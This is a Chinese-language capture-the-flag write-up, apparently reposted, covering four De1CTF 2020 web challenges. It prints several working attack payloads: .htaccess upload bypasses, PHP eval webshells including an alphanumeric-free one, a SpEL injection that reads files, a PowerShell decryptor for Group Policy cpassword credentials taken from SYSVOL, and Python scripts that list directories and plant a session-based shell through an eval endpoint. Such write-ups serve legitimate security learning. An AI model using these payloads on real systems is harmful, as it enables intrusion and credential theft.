De1CTF 2020 部分web

Posted W4nder

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了De1CTF 2020 部分web相关的知识,希望对你有一定的参考价值。

人在天台,感觉良好

check in

考点:配置文件上传

相比之下最友好的一题了emmm
技术图片
主要还是过滤了ph和>,然后是黑名单

考虑上传htaccess,由于不能有ph,故用换行拼接:

Addtype application/x-httpd-php .jpg

一开始多加了个空格导致没正确解析
然后图片马用短标签来绕过:
技术图片

<?=eval($_POST[0]);

相当于

<?php echo eval($_POST[0]);

技术图片
后来出题人说预期解是htaccess可以启用cgi,来执行bash脚本,如下:

.htaccess

Options +ExecCGI
AddHandler cgi-script .sh

solve.sh

#!/bin/bash
echo "Content-Type: text/plain"
echo ""
cat /flag
exit 0

Hard_Pentest_1

考点:无字母数字shell,内网渗透

源码如下

<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER[‘REMOTE_ADDR‘]);
@mkdir($sandbox);
@chdir($sandbox);

if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER[‘REMOTE_ADDR‘])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);

    if(!preg_match(‘/[a-z0-9;~^`&|]/is‘,$file_content)  && 
        !in_array($exts, $BlackExts) && 
        !preg_match(‘/../‘,$_FILES["file"]["name"])) {
          return true;
    }
    return false;
}
?>

后缀不能为php,并且文件内容有匹配/[a-z0-9;~^&|]/is

这里由于是/i的正则,不区分大小写,然后无字母数字shell的话主要参考:
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
不过这里过滤了分号,还是可以用短标签来绕过,如下:

<?=$_=[]?><?=$_=@"$_"?><?=$_=$_[‘!‘==‘@‘]?><?=$___=$_?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?=$____=‘_‘?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$_=$$____?><?=$_[__]($_[_],$_[___])?>

原理就是利用了array取值,然后逐次++,直到拼接到POST
技术图片
上传之后需要写shell:

__=file_put_contents&_=2.php&___=<?php eval($_POST[0]);

技术图片
连上蚁剑后发现是windows系统
技术图片
然后需要渗透,啊这......完全的薄弱项,只发现了一个flaghint压缩包:
技术图片
其实应该是net use命令找到的hint,然后进入//192.168.0.12/hint/
技术图片

技术图片
总之这个压缩包需要密码,在@Pdsdt师傅帮助下看了篇文章,是关于利用SYSVOL还原组策略中保存的密码的
https://3gstudent.github.io/3gstudent.github.io/

首先在每个域内都有一个共享的文件夹SYSVOL,路径为:
<domain>SYSVOL<domain>,所有域内主机都能访问,里面保存组策略相关数据

ipconfig/all 可以查看当前主机的域为De1CTF2020.lab
技术图片
进入共享文件夹:
技术图片
然后需要找到相应的策略组id的配置文件,如下是配置文件Groups.xml
技术图片

技术图片
其中cpassword为AES加密的密码,有现成的脚本,改一下密码即可

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword 
    )

    try {
        #Append appropriate padding based on string length  
        $Mod = ($Cpassword.length % 4)
        
        switch ($Mod) {
        ‘1‘ {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
        ‘2‘ {$Cpassword += (‘=‘ * (4 - $Mod))}
        ‘3‘ {$Cpassword += (‘=‘ * (4 - $Mod))}
        }


        $Base64Decoded = [Convert]::FromBase64String($Cpassword)
        
        #Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
        
        #Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length) 
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor() 
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
        
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    } 
    
    catch {Write-Error $Error[0]}
}  
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"

建一个ps1文件,然后:

powershell -executionpolicy bypass -file 1.ps1

技术图片
得到密码zL1PpP@sSwO3d
技术图片

calc

spring框架,emm不太熟悉javaweb
技术图片
跟到http://106.52.164.141/spel/calc?calc=

然后就硬测,肝了我好久,测了很多种表达式注入payload,不过过滤比较严格,像是T()、java.lang、Runtime、getClass、toString、new

而网上大多数都是这种,基本都凉凉

java.lang.Runtime.getRuntime().exec("calc")

不过这篇文章给的payload还是比较全的,可以看一下:
java表达式注入

然后呢,其实这题可以直接新建对象读文件,我....****

new可以用大写绕过,然后直接用这个BufferedReader和FileReader读文件

(NEW java.io.BufferedReader(NEW java.io.FileReader("/flag"))).readLine()

技术图片
java还是顶

Easy PHP UAF(unsolved)

题目描述:Docker image is php:7.4.2-apache

<?php
error_reporting(0);
if(isset($_GET[‘c‘])) {
  eval($_GET[‘c‘]);
}else {
  highlight_file(__FILE__);
}

源码很简单,由于版本比较高,不能用assert来连shell,然后看一下phpinfo禁用的函数
技术图片
其实过滤的没那么严吧,然后里面过滤了scandir,可以考虑用glob://然后用next索引挨个列目录,脚本如下:

import requests
n=‘$it->next();‘
p=‘printf("%s: %.1FK<br />", $it->getFilename(), $it->getSize()/1024);‘
for i in range(1,20):
    url=‘http://129.204.185.9:8848/?c=$it = new DirectoryIterator("glob:///*");‘
    url=url+n*(i-1)+p
    #print(url)
    print(requests.get(url).text)

技术图片
然后想找别人留下的马骑的2333,可惜没找到,

后来想到可以用session_start然后写入sess进行包含

import requests
n=‘$it->next();‘
p=‘printf("%s: %.1FK<br />", $it->getFilename(), $it->getSize()/1024);‘
for i in range(1,10):
    url=‘http://129.204.185.9:8848/?c=session_start();$_SESSION["b"]="|N;<?php eval($_POST[0]);?>";$it = new DirectoryIterator("glob:///tmp/*");‘
    url=url+n*(i-1)+p
    #print(url)
    print(requests.get(url).text)

成功写入
技术图片
也能命令执行,不过这个session很快就会没
技术图片
但是就是连不上蚁剑,唉,卡在这了
技术图片

以上是关于De1CTF 2020 部分web的主要内容,如果未能解决你的问题,请参考以下文章

BUU-WEB-[De1CTF 2019]SSRF Me

刷题[De1CTF 2019]SSRF Me

[De1CTF 2019]SSRF Me

刷题记录:[De1CTF 2019]Giftbox && Comment

片段布局不覆盖整个屏幕

append() 在这个代码片段中是如何工作的?与特定变量混淆[重复]